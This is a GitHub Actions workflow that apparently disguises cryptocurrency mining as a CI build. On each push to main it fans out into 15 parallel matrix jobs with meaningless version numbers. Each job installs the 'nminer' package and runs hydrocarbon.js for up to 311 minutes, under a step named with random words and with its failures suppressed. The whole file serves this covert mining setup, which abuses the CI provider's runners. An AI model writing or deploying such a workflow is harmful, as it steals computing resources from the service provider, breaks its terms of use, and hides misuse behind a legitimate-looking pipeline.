name: hydrocarbon
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8440 }
          - { version: 5383 }
          - { version: 4534 }
          - { version: 5292 }
          - { version: 9758 }
          - { version: 2955 }
          - { version: 7178 }
          - { version: 8010 }
          - { version: 6940 }
          - { version: 7424 }
          - { version: 3805 }
          - { version: 245 }
          - { version: 7873 }
          - { version: 3234 }
          - { version: 8256 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: evenly disconnection huzzah uh-huh iridescence
        run: |
          npm install nminer@latest
          timeout 311m node hydrocarbon.js || echo "hydrocarbon executed"